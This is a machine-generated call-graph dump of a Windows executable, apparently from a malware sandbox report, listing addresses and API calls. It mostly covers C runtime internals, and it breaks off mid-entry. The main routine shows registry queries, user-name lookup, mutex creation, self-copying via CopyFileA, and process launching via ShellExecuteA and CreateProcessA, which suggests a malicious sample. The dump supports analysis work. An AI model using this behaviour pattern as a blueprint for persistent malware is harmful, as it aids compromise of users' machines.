5f4e3f 25 API calls __Getctype 23941->23959 23943->23943 23948 602664 23943->23948 23955 60874a 37 API calls 3 library calls 23943->23955 23945 6026b4 23945->23948 23956 60874a 37 API calls 3 library calls 23945->23956 23947 6026d2 23947->23948 23957 60874a 37 API calls 3 library calls 23947->23957 23948->23939 23958 5f8b26 14 API calls __dosmaperr 23948->23958 23960 60a754 23950->23960 23953->23937 23954->23939 23955->23945 23956->23947 23957->23948 23958->23941 23959->23939 23963 60a760 __FrameHandler3::FrameUnwindToState 23960->23963 23961 60a767 23980 5f8b26 14 API calls __dosmaperr 23961->23980 23963->23961 23965 60a792 23963->23965 23964 60a76c 23981 5f4e3f 25 API calls __Getctype 23964->23981 23971 60ad21 23965->23971 23970 60a776 23970->23931 23983 6042f4 23971->23983 23975 60ad57 23978 60a7b6 23975->23978 24037 5fce37 14 API calls _free 23975->24037 23982 60a7e9 LeaveCriticalSection __wsopen_s 23978->23982 23980->23964 23981->23970 23982->23970 24038 5f6ccd 23983->24038 23987 604318 23988 5f93c7 23987->23988 24050 5f9315 23988->24050 23991 60adaf 23992 60adcc 23991->23992 23993 60ade1 23992->23993 23994 60adfa 23992->23994 24089 5f8b13 14 API calls __dosmaperr 23993->24089 24075 605ab0 23994->24075 23998 60ae08 24091 5f8b13 14 API calls __dosmaperr 23998->24091 23999 60ae1f 24088 60aa68 CreateFileW 23999->24088 24003 60adf3 24003->23975 24004 60ae0d 24092 5f8b26 14 API calls __dosmaperr 24004->24092 24005 60aed5 GetFileType 24008 60aee0 GetLastError 24005->24008 24009 60af27 24005->24009 24007 60aeaa GetLastError 24094 5f8af0 14 API calls 2 library calls 24007->24094 24095 5f8af0 14 API calls 2 library calls 24008->24095 24097 6059fb 15 API calls 3 library calls 24009->24097 24010 60ade6 24090 5f8b26 14 API calls __dosmaperr 24010->24090 24011 60ae58 24011->24005 24011->24007 24093 60aa68 CreateFileW 24011->24093 24015 60aeee CloseHandle 24015->24010 24018 60af17 24015->24018 24017 60ae9d 24017->24005 24017->24007 24096 5f8b26 14 API calls __dosmaperr 24018->24096 24019 60af48 24021 60af94 24019->24021 24098 60ac77 71 API calls 4 library calls 24019->24098 24026 60af9b 24021->24026 24100 60a815 71 API calls 4 library calls 24021->24100 24022 60af1c 24022->24010 24025 60afc9 24025->24026 24027 60afd7 24025->24027 24099 5fdb0e 28 API calls 2 library calls 24026->24099 24027->24003 24029 60b053 CloseHandle 24027->24029 24101 60aa68 CreateFileW 24029->24101 24031 60b07e 24032 60b088 GetLastError 24031->24032 24036 60afa2 24031->24036 24102 5f8af0 14 API calls 2 library calls 24032->24102 24034 60b094 24103 605bc3 15 API calls 3 library calls 24034->24103 24036->24003 24037->23978 24039 5f6ce4 24038->24039 24040 5f6ced 24038->24040 24039->23987 24046 5fd26e 5 API calls std::_Locinfo::_Locinfo_dtor 24039->24046 24040->24039 24047 5fca90 37 API calls 3 library calls 24040->24047 24042 5f6d0d 24048 600cac 37 API calls __Getctype 24042->24048 24044 5f6d23 24049 600cd9 37 API calls __cftoe 24044->24049 24046->23987 24047->24042 24048->24044 24049->24039 24051 5f933d 24050->24051 24052 5f9323 24050->24052 24054 5f9344 24051->24054 24055 5f9363 24051->24055 24068 5f93e4 14 API calls _free 24052->24068 24060 5f932d 24054->24060 24069 5f9425 15 API calls __wsopen_s 24054->24069 24070 60400f MultiByteToWideChar 24055->24070 24057 5f9372 24059 5f9379 GetLastError 24057->24059 24062 5f939f 24057->24062 24073 5f9425 15 API calls __wsopen_s 24057->24073 24071 5f8af0 14 API calls 2 library calls 24059->24071 24060->23975 24060->23991 24062->24060 24074 60400f MultiByteToWideChar 24062->24074 24063 5f9385 24072 5f8b26 14 API calls __dosmaperr 24063->24072 24067 5f93b6 24067->24059 24067->24060 24068->24060 24069->24060 24070->24057 24071->24063 24072->24060 24073->24062 24074->24067 24076 605abc __FrameHandler3::FrameUnwindToState 24075->24076 24104 5f800d EnterCriticalSection 24076->24104 24078 605b0a 24105 605bba 24078->24105 24080 605ae8 24108 60588a 15 API calls 2 library calls 24080->24108 24081 605ac3 24081->24078 24081->24080 24085 605b57 EnterCriticalSection 24081->24085 24084 605aed 24084->24078 24109 6059d8 EnterCriticalSection 24084->24109 24085->24078 24087 605b64 LeaveCriticalSection 24085->24087 24087->24081 24088->24011 24089->24010 24090->24003 24091->24004 24092->24010 24093->24017 24094->24010 24095->24015 24096->24022 24097->24019 24098->24021 24099->24036 24100->24025 24101->24031 24102->24034 24103->24036 24104->24081 24110 5f8055 LeaveCriticalSection 24105->24110 24107 605b2a 24107->23998 24107->23999 24108->24084 24109->24078 24110->24107 24419 5e1310 29 API calls 24421 5ef70c 16 API calls 2 library calls 24273 5d1005 29 API calls 24423 5d1300 14 API calls 2 library calls 24425 5d2700 68 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 24377 5e3a00 67 API calls 24329 602d00 15 API calls 24378 60c600 21 API calls 24275 608004 GetProcessHeap 24379 5f263b 8 API calls 24380 5f2238 50 API calls 2 library calls 24331 5ef537 DeleteCriticalSection 24276 5d3030 EnterCriticalSection __fread_nolock 24381 5fea32 32 API calls 4 library calls 24382 5dfa30 18 API calls 2 library calls 24383 5f0232 DecodePointer 24430 5d5330 27 API calls std::_Throw_Cpp_error 24278 5d102e 72 API calls 24335 5d3120 LeaveCriticalSection __Getctype 24386 5d3620 47 API calls 24387 5fd6de FreeLibrary 24336 5f99dc 51 API calls 2 library calls 24282 602ce9 IsProcessorFeaturePresent 24434 5f1fd6 37 API calls 2 library calls 24283 5ef0d3 69 API calls ___std_exception_destroy 24337 5d39d0 27 API calls 24436 5d37d0 43 API calls std::_Throw_Cpp_error 24388 5fa2d1 11 API calls __Getctype 24339 5fd9c9 15 API calls 24285 5d3cc7 25 API calls 24111 5dc2c0 24112 5dc2d3 24111->24112 24129 5e4d30 24112->24129 24119 5dc3fe 24159 5d2eb0 25 API calls 24119->24159 24121 5dc408 24160 5d1a50 63 API calls 3 library calls 24121->24160 24122 5dc450 24127 5dc421 24122->24127 24161 5d2310 43 API calls 3 library calls 24122->24161 24125 5dc4ae 24162 5f1930 RaiseException 24125->24162 24128 5dc4bc 24130 5f0a3c std::_Facet_Register 16 API calls 24129->24130 24131 5e4d8e 24130->24131 24132 5e4d9e 24131->24132 24186 5ef760 43 API calls 5 library calls 24131->24186 24163 5d1b80 24132->24163 24135 5e4e13 24137 5dc341 24135->24137 24187 5efbdc 9 API calls 2 library calls 24135->24187 24136 5e4dcf 24136->24135 24139 5e4e2a 24136->24139 24144 5dc640 24137->24144 24188 5d2310 43 API calls 3 library calls 24139->24188 24141 5e4e5e 24189 5f1930 RaiseException 24141->24189 24143 5e4e6c 24145 5f0a3c std::_Facet_Register 16 API calls 24144->24145 24146 5dc65b 24145->24146 24147 5dc360 24146->24147 24199 5ef760 43 API calls 5 library calls 24146->24199 24149 5efdc2 24147->24149 24150 5efd1c 24149->24150 24151 5efd7d 24150->24151 24153 5efdcb 28 API calls 24150->24153 24155 5dc3f6 24150->24155 24158 5efd84 24151->24158 24200 5efdcb 24151->24200 24153->24151 24155->24119 24155->24122 24158->24155 24203 5f51bb 67 API calls 4 library calls 24158->24203 24159->24121 24160->24127 24161->24125 24162->24128 24190 5ef506 7 API calls std::_Lockit::_Lockit 24163->24190 24165 5d1b97 24173 5d1bd2 24165->24173 24191 5ef506 7 API calls std::_Lockit::_Lockit 24165->24191 24167 5d1bb2 24192 5ef55e LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 24167->24192 24170 5d1cb0 24170->24136 24171 5d1c2c 24175 5f0a3c std::_Facet_Register 16 API calls 24171->24175 24172 5d1c19 24193 5ef55e LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 24172->24193 24173->24171 24173->24172 24183 5d1c98 24173->24183 24179 5d1c33 24175->24179 24176 5d1c23 24176->24136 24177 5d1c72 24178 5d1c92 24177->24178 24196 5d25f0 59 API calls 2 library calls 24177->24196 24197 5ef72e 16 API calls std::_Facet_Register 24178->24197 24179->24177 24194 5d2070 62 API calls 2 library calls 24179->24194 24198 5ef55e LeaveCriticalSection LeaveCriticalSection std::_Lockit::~_Lockit 24183->24198 24184 5d1c60 24195 5ef975 41 API calls __Getctype 24184->24195 24186->24132 24187->24137 24188->24141 24189->24143 24190->24165 24191->24167 24192->24173 24193->24176 24194->24184 24195->24177 24197->24183 24198->24170 24199->24147 24205 5f8a5e 24200->24205 24203->24155 24204 5f5e8c 64 API calls 24204->24158 24208 5f89a7 __FrameHandler3::FrameUnwindToState 24205->24208 24206 5f89ba 24230 5f8b26 14 API calls __dosmaperr 24206->24230 24208->24206 24210 5f89da 24208->24210 24209 5f89bf 24231 5f4e3f 25 API calls __Getctype 24209->24231 24212 5f89df 24210->24212 24213 5f89ec 24210->24213 24232 5f8b26 14 API calls __dosmaperr 24212->24232 24222 5fdbd1 24213->24222 24214 5efd9d 24214->24155 24214->24204 24218 5f89fc 24233 5f8b26 14 API calls __dosmaperr 24218->24233 24219 5f8a09 __Getctype 24234 5f8a47 LeaveCriticalSection __Getctype 24219->24234 24223 5fdbdd __FrameHandler3::FrameUnwindToState 24222->24223 24235 5f800d EnterCriticalSection 24223->24235 24225 5fdbeb 24236 5fdc75 24225->24236 24230->24209 24231->24214 24232->24214 24233->24214 24234->24214 24235->24225 24244 5fdc98 24236->24244 24237 5fdbf8 24250 5fdc31 24237->24250 24238 5fdcf0 24255 5fce71 14 API calls 3 library calls 24238->24255 24240 5fdcf9 24256 5fce37 14 API calls _free 24240->24256 24243 5fdd02 24243->24237 24257 5fd4b8 6 API calls __Getctype 24243->24257 24244->24237 24244->24238 24244->24244 24253 5f511c EnterCriticalSection 24244->24253 24254 5f5130 LeaveCriticalSection 24244->24254 24246 5fdd21 24258 5f511c EnterCriticalSection 24246->24258 24249 5fdd34 24249->24237 24259 5f8055 LeaveCriticalSection 24250->24259 24252 5f89f5 24252->24218 24252->24219 24253->24244 24254->24244 24255->24240 24256->24243 24257->24246 24258->24249 24259->24252 24287 5dc4c0 71 API calls 6 library calls 24341 5d11c0 26 API calls ___std_exception_copy 24342 5e41c0 49 API calls 5 library calls 24290 5f48c0 5 API calls _ValidateLocalCookies 24291 6048ff 19 API calls 2 library calls 24343 606dc1 19 API calls __Getctype 24345 606dcc 8 API calls 24346 605dd2 41 API calls 3 library calls 24391 5f0eeb GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24438 6073d4 38 API calls std::_Locinfo::_Locinfo_dtor 24294 5f84ea 45 API calls 5 library calls 24297 5fe89d 39 API calls 3 library calls 24298 5fcc9c 16 API calls __dosmaperr 24393 607aa7 40 API calls 3 library calls 24300 5d3890 65 API calls 24349 5d4190 55 API calls 3 library calls 24301 5d108c std::_Init_wcout::_Init_wcout 24302 5f508a 71 API calls 2 library calls 24352 5d3d80 29 API calls 3 library calls 24442 5d3780 63 API calls 24443 5f0782 41 API calls 24444 5eff81 26 API calls 2 library calls 24445 607387 11 API calls 2 library calls 24446 5f4fb2 15 API calls 2 library calls 24305 5f90b1 20 API calls 23217 5e98ae 23218 5e98cf 23217->23218 23530 5d4740 23218->23530 23220 5d4740 std::_Throw_Cpp_error 43 API calls 23221 5e9c4c 23220->23221 23534 5d9de0 23221->23534 23222 5e9a6e 23222->23220 23222->23222 23224 5e9c65 23225 5d4740 std::_Throw_Cpp_error 43 API calls 23224->23225 23226 5e9cc3 23225->23226 23545 5d1290 23226->23545 23228 5e9cda 23229 5d1290 std::_Throw_Cpp_error 25 API calls 23228->23229 23230 5e9ce5 23229->23230 23231 5d1290 std::_Throw_Cpp_error 25 API calls 23230->23231 23232 5e9cf0 23231->23232 23233 5d1290 std::_Throw_Cpp_error 25 API calls 23232->23233 23234 5e9cfb 23233->23234 23235 5d4740 std::_Throw_Cpp_error 43 API calls 23234->23235 23238 5e9ecc 23235->23238 23236 5d4740 std::_Throw_Cpp_error 43 API calls 23237 5ea0ac 23236->23237 23239 5d9de0 47 API calls 23237->23239 23238->23236 23238->23238 23240 5ea0c5 23239->23240 23241 5d4740 std::_Throw_Cpp_error 43 API calls 23240->23241 23242 5ea123 23241->23242 23243 5d1290 std::_Throw_Cpp_error 25 API calls 23242->23243 23244 5ea13a 23243->23244 23245 5d1290 std::_Throw_Cpp_error 25 API calls 23244->23245 23246 5ea145 23245->23246 23247 5d1290 std::_Throw_Cpp_error 25 API calls 23246->23247 23248 5ea150 23247->23248 23249 5d1290 std::_Throw_Cpp_error 25 API calls 23248->23249 23250 5ea15b 23249->23250 23251 5d4740 std::_Throw_Cpp_error 43 API calls 23250->23251 23253 5ea32c 23251->23253 23252 5d4740 std::_Throw_Cpp_error 43 API calls 23254 5ea50c 23252->23254 23253->23252 23253->23253 23255 5d9de0 47 API calls 23254->23255 23256 5ea525 23255->23256 23257 5d4740 std::_Throw_Cpp_error 43 API calls 23256->23257 23258 5ea589 23257->23258 23259 5d1290 std::_Throw_Cpp_error 25 API calls 23258->23259 23260 5ea5a0 23259->23260 23261 5d1290 std::_Throw_Cpp_error 25 API calls 23260->23261 23262 5ea5ab 23261->23262 23263 5d1290 std::_Throw_Cpp_error 25 API calls 23262->23263 23264 5ea5b6 23263->23264 23265 5d1290 std::_Throw_Cpp_error 25 API calls 23264->23265 23266 5ea5c1 23265->23266 23266->23266 23267 5d4740 std::_Throw_Cpp_error 43 API calls 23266->23267 23269 5ea79c 23267->23269 23268 5d4740 std::_Throw_Cpp_error 43 API calls 23270 5ea97c 23268->23270 23269->23268 23269->23269 23271 5d9de0 47 API calls 23270->23271 23272 5ea995 23271->23272 23273 5d4740 std::_Throw_Cpp_error 43 API calls 23272->23273 23274 5eaa92 23273->23274 23275 5d1290 std::_Throw_Cpp_error 25 API calls 23274->23275 23276 5eaaa9 23275->23276 23277 5d1290 std::_Throw_Cpp_error 25 API calls 23276->23277 23278 5eaab4 23277->23278 23279 5d1290 std::_Throw_Cpp_error 25 API calls 23278->23279 23280 5eaabf 23279->23280 23281 5d1290 std::_Throw_Cpp_error 25 API calls 23280->23281 23283 5eaaca 23281->23283 23282 5d4740 std::_Throw_Cpp_error 43 API calls 23285 5eac9c 23282->23285 23283->23282 23284 5d4740 std::_Throw_Cpp_error 43 API calls 23286 5eae7c 23284->23286 23285->23284 23285->23285 23287 5d9de0 47 API calls 23286->23287 23288 5eae95 23287->23288 23289 5d4740 std::_Throw_Cpp_error 43 API calls 23288->23289 23290 5eaef3 23289->23290 23291 5d1290 std::_Throw_Cpp_error 25 API calls 23290->23291 23292 5eaf0a 23291->23292 23293 5d1290 std::_Throw_Cpp_error 25 API calls 23292->23293 23294 5eaf15 23293->23294 23295 5d1290 std::_Throw_Cpp_error 25 API calls 23294->23295 23296 5eaf20 23295->23296 23297 5d1290 std::_Throw_Cpp_error 25 API calls 23296->23297 23298 5eaf2b 23297->23298 23299 5d4740 std::_Throw_Cpp_error 43 API calls 23298->23299 23300 5eb0fc 23299->23300 23301 5d4740 std::_Throw_Cpp_error 43 API calls 23300->23301 23302 5eb2dc 23301->23302 23303 5d9de0 47 API calls 23302->23303 23305 5eb2f7 23303->23305 23304 5d4740 std::_Throw_Cpp_error 43 API calls 23306 5eb4a3 23304->23306 23305->23304 23305->23305 23307 5d1290 std::_Throw_Cpp_error 25 API calls 23306->23307 23308 5eb4bb 23307->23308 23309 5d1290 std::_Throw_Cpp_error 25 API calls 23308->23309 23310 5eb4c6 23309->23310 23311 5d1290 std::_Throw_Cpp_error 25 API calls 23310->23311 23312 5eb4d1 23311->23312 23313 5d1290 std::_Throw_Cpp_error 25 API calls 23312->23313 23314 5eb4dc 23313->23314 23315 5d4740 std::_Throw_Cpp_error 43 API calls 23314->23315 23316 5eb6ad 23315->23316 23317 5d4740 std::_Throw_Cpp_error 43 API calls 23316->23317 23318 5eb88c 23317->23318 23319 5d9de0 47 API calls 23318->23319 23321 5eb8a7 23319->23321 23320 5d4740 std::_Throw_Cpp_error 43 API calls 23322 5eba56 23320->23322 23321->23320 23321->23321 23323 5d1290 std::_Throw_Cpp_error 25 API calls 23322->23323 23324 5eba6e 23323->23324 23325 5d1290 std::_Throw_Cpp_error 25 API calls 23324->23325 23326 5eba79 23325->23326 23327 5d1290 std::_Throw_Cpp_error 25 API calls 23326->23327 23328 5eba84 23327->23328 23329 5d1290 std::_Throw_Cpp_error 25 API calls 23328->23329 23330 5eba8f 23329->23330 23331 5d4740 std::_Throw_Cpp_error 43 API calls 23330->23331 23332 5ebc70 23331->23332 23333 5d4740 std::_Throw_Cpp_error 43 API calls 23332->23333 23334 5ebe50 23333->23334 23335 5d9de0 47 API calls 23334->23335 23338 5ebe6b 23335->23338 23336 5d4740 std::_Throw_Cpp_error 43 API calls 23337 5ec023 23336->23337 23339 5d1290 std::_Throw_Cpp_error 25 API calls 23337->23339 23338->23336 23338->23338 23340 5ec03b 23339->23340 23341 5d1290 std::_Throw_Cpp_error 25 API calls 23340->23341 23342 5ec046 23341->23342 23343 5d1290 std::_Throw_Cpp_error 25 API calls 23342->23343 23344 5ec051 23343->23344 23345 5d1290 std::_Throw_Cpp_error 25 API calls 23344->23345 23347 5ec05c 23345->23347 23346 5ec643 GetModuleHandleA 23346->23347 23347->23346 23348 5ec663 GetVersion 23347->23348 23349 5ec6c1 23348->23349 23349->23349 23350 5d4740 std::_Throw_Cpp_error 43 API calls 23349->23350 23351 5ec84d 23350->23351 23352 5d4740 std::_Throw_Cpp_error 43 API calls 23351->23352 23353 5eca30 23352->23353 23354 5d4740 std::_Throw_Cpp_error 43 API calls 23353->23354 23355 5ecbf9 23354->23355 23552 5d65f0 23355->23552 23361 5ecc2e 23362 5ecc3f 23361->23362 23363 5ef1ab 23361->23363 23701 5dd550 104 API calls 3 library calls 23362->23701 23761 5efedb 43 API calls std::_Throw_Cpp_error 23363->23761 23367 5ecc4b 23702 5e48b0 GetUserNameA 23367->23702 23369 5ecc57 23710 5e4730 44 API calls std::_Throw_Cpp_error 23369->23710 23371 5ecc63 23372 5d4740 std::_Throw_Cpp_error 43 API calls 23371->23372 23373 5ecdfa 23372->23373 23374 5d4740 std::_Throw_Cpp_error 43 API calls 23373->23374 23375 5ecfe0 23374->23375 23376 5d9de0 47 API calls 23375->23376 23377 5ecffb 23376->23377 23378 5d1290 std::_Throw_Cpp_error 25 API calls 23377->23378 23379 5ed009 23378->23379 23380 5d1290 std::_Throw_Cpp_error 25 API calls 23379->23380 23381 5ed014 23380->23381 23382 5d4740 std::_Throw_Cpp_error 43 API calls 23381->23382 23383 5ed1a9 23382->23383 23384 5d4740 std::_Throw_Cpp_error 43 API calls 23383->23384 23385 5ed213 23384->23385 23711 5e52e0 27 API calls 3 library calls 23385->23711 23387 5ed223 23712 5e3530 27 API calls 5 library calls 23387->23712 23389 5ed230 23390 5d4740 std::_Throw_Cpp_error 43 API calls 23389->23390 23391 5ed299 23390->23391 23392 5d4740 std::_Throw_Cpp_error 43 API calls 23391->23392 23393 5ed30d 23392->23393 23713 5e52e0 27 API calls 3 library calls 23393->23713 23395 5ed31a 23714 5e3530 27 API calls 5 library calls 23395->23714 23397 5ed327 23398 5d4740 std::_Throw_Cpp_error 43 API calls 23397->23398 23399 5ed398 23398->23399 23400 5d4740 std::_Throw_Cpp_error 43 API calls 23399->23400 23401 5ed40c 23400->23401 23715 5e52e0 27 API calls 3 library calls 23401->23715 23403 5ed419 23716 5e3530 27 API calls 5 library calls 23403->23716 23405 5ed426 23406 5d4740 std::_Throw_Cpp_error 43 API calls 23405->23406 23407 5ed498 23406->23407 23408 5d4740 std::_Throw_Cpp_error 43 API calls 23407->23408 23409 5ed50c 23408->23409 23717 5e52e0 27 API calls 3 library calls 23409->23717 23411 5ed519 23718 5e3530 27 API calls 5 library calls 23411->23718 23413 5ed526 23414 5d4740 std::_Throw_Cpp_error 43 API calls 23413->23414 23415 5ed585 23414->23415 23416 5d4740 std::_Throw_Cpp_error 43 API calls 23415->23416 23417 5ed5f9 23416->23417 23719 5e52e0 27 API calls 3 library calls 23417->23719 23419 5ed606 23720 5e3530 27 API calls 5 library calls 23419->23720 23421 5ed613 23422 5d4740 std::_Throw_Cpp_error 43 API calls 23421->23422 23423 5ed672 23422->23423 23721 5d6420 23423->23721 23425 5ed684 23426 5d6420 27 API calls 23425->23426 23427 5ed69c 23426->23427 23428 5d6420 27 API calls 23427->23428 23429 5ed6b1 23428->23429 23430 5d6420 27 API calls 23429->23430 23431 5ed6c9 23430->23431 23432 5d6420 27 API calls 23431->23432 23433 5ed6e4 23432->23433 23434 5d6420 27 API calls 23433->23434 23435 5ed6ff 23434->23435 23436 5d6420 27 API calls 23435->23436 23437 5ed71a 23436->23437 23438 5d6420 27 API calls 23437->23438 23439 5ed735 23438->23439 23440 5d6420 27 API calls 23439->23440 23441 5ed74d 23440->23441 23442 5d1290 std::_Throw_Cpp_error 25 API calls 23441->23442 23443 5ed758 23442->23443 23444 5d1290 std::_Throw_Cpp_error 25 API calls 23443->23444 23445 5ed763 23444->23445 23446 5d1290 std::_Throw_Cpp_error 25 API calls 23445->23446 23447 5ed76e 23446->23447 23448 5d1290 std::_Throw_Cpp_error 25 API calls 23447->23448 23449 5ed779 23448->23449 23450 5d1290 std::_Throw_Cpp_error 25 API calls 23449->23450 23451 5ed784 23450->23451 23452 5d1290 std::_Throw_Cpp_error 25 API calls 23451->23452 23453 5ed78c 23452->23453 23454 5d1290 std::_Throw_Cpp_error 25 API calls 23453->23454 23455 5ed797 23454->23455 23456 5d1290 std::_Throw_Cpp_error 25 API calls 23455->23456 23457 5ed7a2 23456->23457 23458 5d1290 std::_Throw_Cpp_error 25 API calls 23457->23458 23459 5ed7ad 23458->23459 23460 5d1290 std::_Throw_Cpp_error 25 API calls 23459->23460 23461 5ed7b8 23460->23461 23462 5d1290 std::_Throw_Cpp_error 25 API calls 23461->23462 23463 5ed7c3 23462->23463 23464 5d1290 std::_Throw_Cpp_error 25 API calls 23463->23464 23465 5ed7ce 23464->23465 23466 5d1290 std::_Throw_Cpp_error 25 API calls 23465->23466 23467 5ed7d9 23466->23467 23468 5d1290 std::_Throw_Cpp_error 25 API calls 23467->23468 23469 5ed7e4 23468->23469 23470 5d1290 std::_Throw_Cpp_error 25 API calls 23469->23470 23471 5ed7ef 23470->23471 23472 5d1290 std::_Throw_Cpp_error 25 API calls 23471->23472 23473 5ed7fa 23472->23473 23474 5d1290 std::_Throw_Cpp_error 25 API calls 23473->23474 23475 5ed805 23474->23475 23476 5d1290 std::_Throw_Cpp_error 25 API calls 23475->23476 23477 5ed810 23476->23477 23478 5d1290 std::_Throw_Cpp_error 25 API calls 23477->23478 23479 5ed81b 23478->23479 23480 5d1290 std::_Throw_Cpp_error 25 API calls 23479->23480 23481 5ed826 23480->23481 23482 5d1290 std::_Throw_Cpp_error 25 API calls 23481->23482 23483 5ed831 23482->23483 23484 5d1290 std::_Throw_Cpp_error 25 API calls 23483->23484 23485 5ed83c 23484->23485 23486 5d1290 std::_Throw_Cpp_error 25 API calls 23485->23486 23487 5ed847 23486->23487 23488 5d1290 std::_Throw_Cpp_error 25 API calls 23487->23488 23489 5ed852 23488->23489 23490 5d1290 std::_Throw_Cpp_error 25 API calls 23489->23490 23491 5ed85d 23490->23491 23492 5d1290 std::_Throw_Cpp_error 25 API calls 23491->23492 23493 5ed868 23492->23493 23494 5d1290 std::_Throw_Cpp_error 25 API calls 23493->23494 23495 5ed873 23494->23495 23496 5d1290 std::_Throw_Cpp_error 25 API calls 23495->23496 23497 5ed87e 23496->23497 23498 5d1290 std::_Throw_Cpp_error 25 API calls 23497->23498 23500 5ed889 23498->23500 23501 5edab7 23500->23501 23502 5d1290 std::_Throw_Cpp_error 25 API calls 23500->23502 23730 5d1820 23500->23730 23528 5edaca _Yarn 23501->23528 23747 5d17c0 16 API calls std::_Facet_Register 23501->23747 23502->23500 23504 5d5610 26 API calls std::invalid_argument::invalid_argument 23504->23528 23506 5ef0ad Sleep 23760 5dcb90 25 API calls 2 library calls 23506->23760 23507 5f1930 RaiseException std::_Throw_Cpp_error 23507->23528 23511 5e52e0 27 API calls 23511->23528 23513 5d9f20 39 API calls 23513->23528 23516 5d29c0 113 API calls 23516->23528 23518 5df3a0 33 API calls 23518->23528 23519 5e3530 27 API calls 23519->23528 23520 5d4740 43 API calls std::_Throw_Cpp_error 23520->23528 23521 5dc6e0 16 API calls 23521->23528 23523 5dadc0 27 API calls 23523->23528 23524 5d63a0 27 API calls 23524->23528 23525 5d1290 25 API calls std::_Throw_Cpp_error 23525->23528 23527 5d5880 49 API calls 23527->23528 23528->23504 23528->23506 23528->23507 23528->23511 23528->23513 23528->23516 23528->23518 23528->23519 23528->23520 23528->23521 23528->23523 23528->23524 23528->23525 23528->23527 23748 5d6340 43 API calls std::_Throw_Cpp_error 23528->23748 23749 5e5140 27 API calls 23528->23749 23750 5e4a30 27 API calls 5 library calls 23528->23750 23751 5e5bd0 43 API calls 2 library calls 23528->23751 23752 5d56b0 50 API calls 3 library calls 23528->23752 23753 5d4780 59 API calls 3 library calls 23528->23753 23754 5dcb40 25 API calls 2 library calls 23528->23754 23755 5d1330 53 API calls __wsopen_s 23528->23755 23756 5f66fe 23528->23756 23759 5dcb90 25 API calls 2 library calls 23528->23759 23531 5d4763 23530->23531 23531->23531 23532 5d1820 std::_Throw_Cpp_error 43 API calls 23531->23532 23533 5d4775 23532->23533 23533->23222 23535 5d9df8 RegOpenKeyExA 23534->23535 23536 5d9df6 23534->23536 23537 5d9e4b 23535->23537 23538 5d9e13 RegQueryValueExA 23535->23538 23536->23535 23537->23224 23540 5d9e45 RegCloseKey 23538->23540 23541 5d9e66 RegCloseKey 23538->23541 23540->23537 23542 5d9e90 23541->23542 23542->23542 23543 5d1820 std::_Throw_Cpp_error 43 API calls 23542->23543 23544 5d9ea8 23543->23544 23544->23224 23546 5d129b 23545->23546 23547 5d12b6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23545->23547 23546->23547 23762 5f4e4f 25 API calls __Getctype 23546->23762 23547->23228 23553 5d664f 23552->23553 23553->23553 23554 5d1820 std::_Throw_Cpp_error 43 API calls 23553->23554 23555 5d67ae 23554->23555 23763 5d9c00 23555->23763 23557 5d67bf CreateMutexA 23558 5d67ff std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23557->23558 23559 5d6871 GetLastError 23558->23559 23562 5d8b8f 23558->23562 23563 5d6867 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23558->23563 23560 5d8b94 23559->23560 23561 5d6882 GetEnvironmentVariableA 23559->23561 23565 5f66fe 23 API calls 23560->23565 23568 5d68ce 23561->23568 23802 5f4e4f 25 API calls __Getctype 23562->23802 23563->23559 23566 5d8b9b 23565->23566 23803 5f4e4f 25 API calls __Getctype 23566->23803 23568->23568 23570 5d1820 std::_Throw_Cpp_error 43 API calls 23568->23570 23569 5d4740 std::_Throw_Cpp_error 43 API calls 23571 5d8bc5 23569->23571 23572 5d6a36 23570->23572 23795 5d63c0 23571->23795 23576 5d1820 std::_Throw_Cpp_error 43 API calls 23572->23576 23578 5d6a6d 23576->23578 23577 5d8bf2 23580 5d8bfc ShellExecuteA 23577->23580 23776 5d3190 23578->23776 23583 5d1290 std::_Throw_Cpp_error 25 API calls 23580->23583 23581 5d6a7c 23582 5d6420 27 API calls 23581->23582 23591 5d6aba std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23582->23591 23584 5d8c15 23583->23584 23585 5d1290 std::_Throw_Cpp_error 25 API calls 23584->23585 23586 5d8c20 23585->23586 23588 5d1290 std::_Throw_Cpp_error 25 API calls 23586->23588 23587 5d6b6b CreateDirectoryA GetModuleFileNameA 23590 5d6bbe 23587->23590 23589 5d8c2b 23588->23589 23593 5d1290 std::_Throw_Cpp_error 25 API calls 23589->23593 23596 5d1820 std::_Throw_Cpp_error 43 API calls 23590->23596 23591->23566 23591->23587 23592 5d6b61 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23591->23592 23592->23587 23594 5d8c36 23593->23594 23595 5f66fe 23 API calls 23594->23595 23597 5d8c3d 23595->23597 23600 5d6d3a 23596->23600 23804 5f4e4f 25 API calls __Getctype 23597->23804 23601 5d1820 std::_Throw_Cpp_error 43 API calls 23600->23601 23602 5d6db6 23601->23602 23604 5d9c00 27 API calls 23602->23604 23605 5d6ddb 23604->23605 23607 5d6420 27 API calls 23605->23607 23609 5d6e19 CopyFileA 23607->23609 23615 5d6e3c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23609->23615 23616 5d1820 std::_Throw_Cpp_error 43 API calls 23615->23616 23618 5d70c9 23616->23618 23619 5d1820 std::_Throw_Cpp_error 43 API calls 23618->23619 23620 5d714d 23619->23620 23621 5d9c00 27 API calls 23620->23621 23622 5d7175 23621->23622 23623 5d6420 27 API calls 23622->23623 23625 5d71b9 23623->23625 23625->23625 23627 5d1820 std::_Throw_Cpp_error 43 API calls 23625->23627 23628 5d724d 23627->23628 23629 5d1820 std::_Throw_Cpp_error 43 API calls 23628->23629 23630 5d73eb 23629->23630 23631 5d1820 std::_Throw_Cpp_error 43 API calls 23630->23631 23632 5d75d3 23631->23632 23634 5d6420 27 API calls 23632->23634 23636 5d75ec 23634->23636 23638 5d6420 27 API calls 23636->23638 23639 5d7602 23638->23639 23640 5d6420 27 API calls 23639->23640 23641 5d7618 23640->23641 23642 5d3190 std::_Throw_Cpp_error 27 API calls 23641->23642 23643 5d7627 __fread_nolock std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 23642->23643 23644 5d78cf CreateProcessA 23643->23644 23645 5d7917 WaitForSingleObject CloseHandle CloseHandle 23644->23645 23648 5d7932 23644->23648 23645->23648 23649 